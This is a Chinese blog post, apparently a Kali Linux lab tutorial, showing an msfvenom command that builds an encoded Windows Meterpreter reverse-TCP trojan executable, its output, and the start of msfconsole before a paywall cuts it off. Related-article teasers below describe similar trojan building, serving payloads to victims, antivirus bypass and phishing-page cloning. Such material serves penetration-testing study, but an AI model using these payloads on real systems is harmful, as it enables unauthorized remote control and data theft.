kali攻防第9章 Metasploit之我的远程控制软件

最新推荐文章于 2025-06-28 11:59:47 发布
置顶 最新推荐文章于 2025-06-28 11:59:47 发布
阅读量1.1w 收藏 16
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 安全攻防之旅
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/strom2418/article/details/50206487

准备工具

1、KALI系统 IP 10.10.10.131

2、受害系统 IP 10.10.10.133

 

 

步骤:

1、生成木马控制程序

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.10.10.131 LPORT=443 -f exe > abc.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

Found 1 compatible encoders

Attempting to encode payload with 5 iterations of x86/shikata_ga_nai

x86/shikata_ga_nai succeeded with size 360 (iteration=0)

x86/shikata_ga_nai succeeded with size 387 (iteration=1)

x86/shikata_ga_nai succeeded with size 414 (iteration=2)

x86/shikata_ga_nai succeeded with size 441 (iteration=3)

x86/shikata_ga_nai succeeded with size 468 (iteration=4)

x86/shikata_ga_nai chosen with final size 468

Payload size: 468 bytes

注意: LHOSTLPORT是本地自己的IP不是受害者的IP

2、通过命令启动Metasploit

root@kali:~# msfconsole

  +-------------------------------------------------------+

  |  METASPLOIT by Rapid7                                 |

  +---------------------------+---------------------------+

  |      __________________   |        

最低0.47元/天 解锁文章

200万优质内容无限畅学
kali的学习笔记篇(四)metasploit之远控
Kind&红衣的博客
08-11 1508
看的是15年的老电影了(教程) msfpayload 15年就被丢弃了,搞了才发现被集成到msfvenom里了。 生成木马: #参数 -p [指定攻击载荷名称] #参数 -f [指定payload的输出格式] #参数 -x 指定捆绑到哪个文件上 msfvenom -p windows/meterpreter/reverse_tcp LHOST=[myIP] LPORT=[myPORT] ...
49、深入探索Windows系统的安全攻防
最新发布
plant的博客
07-17 27
本文深入探讨了Windows系统的安全攻防技术,涵盖了Windows Server的特性、攻击与Linux的差异、域结构、用户权限、密码哈希提取、杀毒软件绕过、UAC绕过方法以及防御策略等内容。通过详细的步骤解析和实际案例分析,帮助读者全面了解Windows系统的安全威胁与防护措施,为构建更安全的企业网络环境提供参考。
Metasploit入门到高级【第九章
Kali与编程
04-04 642
Metasploit 是什么Metasploit 的历史和发展Metasploit 的组成部分Metasploit 的未来发展趋势Metasploit 的优缺点及其在安全领域中的作用## 第九章Metasploit 高级应用- Metasploit 的高级应用技巧和方法- 如何使用 Metasploit 进行信息窃取、渗透测试等高级操作Metasploit 的高级应用技巧和方法。
黑客技术之MSF远程渗透操控别人手机
yy1715713348的博客
06-28 1071
一、前言MSF,全称为Metasploit Framework,是kali中一款全球知名的开源渗透测试工具。此文中的方法只能进行内网渗透。由于kali在虚拟机中,其显示的内网IP无法被外网的安卓手机S直接访问,所以不能直接将文方法应用于外网。该实验为模拟环境,未经授权的渗透都是违法行为,我们都是守法的好公民。而且这种方法只能渗透安卓10以下的系统,入侵渗透更高级的系统需要更加专业的知识,再加上只能进行内网渗透,所以这种方法很难进行违法渗透!二、演示环境。
kali 远程控制
shaxiao_的博客
06-09 1270
检查apache2服务是否启动:systemctl status apache2. 启动apache2服务:systemctl start apache2.service。检查apache2服务是否启动:systemctl status apache2. 启动apache2服务:systemctl start apache2.service。4.使用--list-options选项查看攻击载荷需要设置的参数。4.使用--list-options选项查看攻击载荷需要设置的参数。
Kali远程控制
2301_78160271的博客
03-27 1437
学习了Kali远程控制后,我掌握了一项实用的技能,提高了工作效率和安全意识。这项技能对于系统管理员、网络安全专家和渗透测试人员来说都是非常有价值的。我将继续学习和应用这项技能,以更好地应对各种远程访问和管理需求。
kali metasploit 远程控制Windows
天码行空的码的博客
07-08 2322
一、在kali中生成被控制端程序 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.88.188 LPORT=5901 -f exe > test.exe #生成Windows端 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.88.188 LPORT=5555 R
kalikali常见攻击手段
2403_83442903的博客
06-03 893
至此,后门植入成功!它通常被用来伪造邮件,进行钓鱼、社工等操作。如果想克隆指定的页面的话,就选择2站点克隆,当然,这个功能虽然强大,但是有的网站是无法克隆的,如果无法克隆,就选择3,自己制作一样的网站去钓鱼。我们将账号和密码都设为admin,点击登陆,发现有跳转到了真正的页面,也不会返回账号信息错误的界面,同时,kali也将我们输入的信息截获了,并在终端显示。通常是应用层攻击,攻击对象是网页,涉及的协议主要是HTTP,HTTPS,消耗的是服务器的CPU资源(通过请求大量调用CPU的资源,例如查询数据库)
从实践中学习Kali Linux渗透测试
cc123489ll的博客
06-19 950
1.1.1 黑盒测试黑盒测试(Black-box Testing)也称为外部测试(ExternalTesting)。采用这种方式,测试者将从一个远程网络位置评估目标网络基础设施,并没有任何目标网络内部拓扑等相关信息。完全模拟真实网络环境中的外部攻击者,采用流行技术与工具有组织、有步骤的对目标组织进行渗透和入侵,揭示目标网络中一些已知或未知的安全漏洞,并评估这些漏洞能否被利用。优点:有利于挖掘出系统潜在的漏洞,以及脆弱环节和薄弱点。缺点:测试较为费时和费力,同时需要渗透测试者具备较高的技术能力。
Kali Linux2020 渗透测试指南》配套技术精讲
Ms08067安全实验室
11-10 1417
Kali是世界渗透测试行业公认的优秀的网络安全审计工具集合,它可以通过对设备的探测来审计它的安全性,而且功能极为完备,几乎包含了目前所有的热门工具。Kali的强大功能是毋庸置疑的,它几乎...
Kali远程操纵win7
2301_81475812的博客
03-28 1194
攻击方:kali IPV4:192.168.92.133被攻击方:win7 IPV4:192.168.92.130。
kali远程控制windows物理机
2301_80041207的博客
10-28 320
kali中以root权限运行终端,输入以下命令,其中lhost=靶机IP,/var/payload.exe是生成程序将会储存到的路径。(/root/payload :储存到root文件夹(需要用root权限打开)下,在较新版kali无法将root文件夹里的文件移到桌面)二,将exe文件拖入windows物理机,并点击运行。前提:将电脑里的安全杀毒软件和电脑自带的病毒杀查给关闭,不然文件会被检测出来并清除掉。远程控制windows物理机需要用到kali中的msfvenom功能生成被控端。
Metasploit高级技术【第九章
Kali与编程
04-15 507
Metasploit是一款开源的渗透测试和漏洞利用框架,可以支持多种操作系统和平台,提供多种攻击模块和工具,支持多种攻击技术和方法,如漏洞利用、密码破解、后门注入、社会工程学攻击等。Metasploit可以用于模拟黑客攻击、漏洞扫描和评估、渗透测试和评估、安全防御和响应等场景,帮助安全团队测试系统的安全防御能力和漏洞修复效果,提供安全防御建议和措施。红队作战是一种有效的安全测试和评估手段,可以发现安全弱点和漏洞,提高安全意识和应急响应能力,提高安全防御能力,降低安全风险和损失,评估安全投资效果。
kali对Windows的简单远程控制
2301_79934678的博客
10-30 635
如果无法移动,可以把文件复制到kali的网站主目录下(var/www/html),然后启动apache2,到Windows靶机下载被控端payload.exe即可。这个文件生成后会保存在kali的root文件夹(需要用root权限打开)中,打开文件夹后将文件payload.exe移动到Windows系统中。设置一个lhost和lport,lhost就是文开始创建payload.exe时的kali的ip,lport也是一样,5000端口。ip是自己kali的ip,lport指定一个端口。
kali远程控制(windows7、windowsXP、安卓)
heikehuaxioa的博客
04-17 1079
步骤二:把被控端放到kali的网站主目录下,启动apache2,到目标靶机(WinXPenSP3)下载被控端并运行。步骤二:把被控端放到kali的网站主目录下,启动apache2,到目标靶机(安卓虚拟机)下载被控端并运行。测试用windows 7系统(32位Windows7)的IP: 192.168.138.132。Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)2、输入shell,执行各种命令,如查看操作系统信息、切换到root用户等。
kali实现远程控制-----msfvenom控制夺权
2301_81693492的博客
10-27 929
1.在kali中生成被控端;IP写kali的地址 2.在靶机ExpNIS.Windows中用浏览器下载并运行winpayload.exe; 3.打开主控端,启动metasploit,进入metasploit(msf)的控制台。 4.控制目标靶机 5.检测:在虚拟机中打开网站:www.virustotal.com;habo.qq.com;上传下载的
模拟黑客使用Kali Linux远程控制Windows(互联网)
HKBlackeagle的专栏
01-29 3816
通过内网穿透实现kali控制windows
kali (linux) 配置windows远程桌面(mstsc.exe)连接
雷小莫_code
09-02 1018
1) tightvncserver是一个轻量级,只能建立桌面,不能查看TTY7/TTY1正在显示的桌面,但x11vnc可以,相比x11vnc安全传输差一些。2) XRDP是一个服务器的远程桌面协议(RDP),Xrdp是免费软件。3)Windows运行mstsc远程桌面连接,输入IP地址,选择Xorge,输入kali用户名和密码即可。2) 修改/etc/xrdp/startwm.sh文件。二、安装tightvncserver。2)卸载tightvncserver。1) 启动ssh服务。2)启动xrdp服务。
使用KALI生成木马病毒实现远程控制
小司机的奥拓
12-25 5239
该文内容仅用于学习使用Kali Linux系统,请不要将它用于非法的途径,如有意外概不负责。我将会详细介绍使用Kali Linux系统生成木马并用它远程控制一台处在外网的物理计算机,使用到的工具有:1、VMware Workstation Pro 16(虚拟机)下载地址:https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.html2、Kali Linux 2021(系统)
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

随行之旅

python国产化自动化

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值